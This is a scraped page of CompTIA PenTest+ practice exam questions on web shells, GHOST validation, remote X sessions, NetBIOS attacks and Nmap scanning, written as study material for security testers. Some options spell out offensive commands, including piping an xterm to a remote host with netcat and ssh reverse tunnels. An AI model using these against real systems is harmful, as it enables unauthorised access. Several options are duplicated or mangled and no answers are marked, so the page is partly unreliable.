Comptia (PT0-001) Exam Questions And Answers page 11
A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?
Obtaining client acceptance
Removing tester-created credentials
Documenting lessons learned
Presenting attestation of findings
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to check manually if a ghost vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
Download the GHOST file to a Linux system and compile
gcc -o GHOST
test i:
./GHOST
gcc -o GHOST
test i:
./GHOST
Download the GHOST file to a Windows system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST
gcc -o GHOST GHOST.c
test i:
./GHOST
Download the GHOST file to a Linux system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST
gcc -o GHOST GHOST.c
test i:
./GHOST
Download the GHOST file to a Windows system and compile
gcc -o GHOST
test i:
./GHOST
gcc -o GHOST
test i:
./GHOST
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to check manually if a ghost vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
Download the GHOST file to a Linux system and compile
gcc o GHOST
test i:
./GHOST
gcc o GHOST
test i:
./GHOST
Download the GHOST file to a Windows system and compile
gcc o GHOST GHOST.c
test i:
./GHOST
gcc o GHOST GHOST.c
test i:
./GHOST
Download the GHOST file to a Linux system and compile
gcc o GHOST GHOST.c
test i:
./GHOST
gcc o GHOST GHOST.c
test i:
./GHOST
Download the GHOST file to a Windows system and compile
gcc o GHOST
test i:
./GHOST
gcc o GHOST
test i:
./GHOST
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal
export XHOST 192.168.1.10:0.0
xhost+
Terminal
From the local computer, run the following command:
ssh -L4444:127.0.0.1:6000 -X [email protected] xterm
ssh -L4444:127.0.0.1:6000 -X [email protected] xterm
From the remote computer, run the following command:
ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] xhost+; xterm
ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] xhost+; xterm
From the local computer, run the following command:
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
nmap -p 53 -oG dnslist.txt | cut -d : -f 4
nslookup -ns 8.8.8.8 <>
for x in {1...254}; do dig -x 192.168.$x.$x; done
dig -r > echo 8.8.8.8 >> /etc/resolv.conf
Attacks and Exploits
Penetration Testing Tools
A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?
arpspoof
nmap
responder
burpsuite
Attacks and Exploits
Penetration Testing Tools
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
Randomize the credentials used to log in.
Install host-based intrusion detection.
Implement input normalization.
Perform system hardening.
Attacks and Exploits
Penetration Testing Tools
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).
Mandate all employees take security awareness training.
Implement two-factor authentication for remote access.
Install an intrusion prevention system.
Increase password complexity requirements.
Install a security information event monitoring solution.
Prevent members of the IT department from interactively logging in as administrators.
Upgrade the cipher suite used for the VPN solution.
Information Gathering and Vulnerability Identification
Attacks and Exploits
A penetration tester, who is not on the client s network. is using Nmap to scan the network for hosts that are in scope. The penetration tester is not receiving any response on the command:
nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?
nmap 100.100/1/0-125
Which of the following commands would be BEST to return results?
nmap -Pn -sT 100.100.1.0-125
nmap -sF -p 100.100.1.0-125
nmap -sV -oA output 100.100.10-125
nmap 100.100.1.0-125 -T4
Planning and Scoping
Penetration Testing Tools
A penetration testing company is performing a penetration test against Company A. Company A has provided the IP address range 10.0.0.0/24 as its in-scope network range. During the information gathering phase, the penetration tester is asked to conduct active information-gathering techniques. Which of the following is the BEST tool to use for active information gathering?
hping3
theHarvester
tcpdump
Nmap
Information Gathering and Vulnerability Identification
Penetration Testing Tools
Comments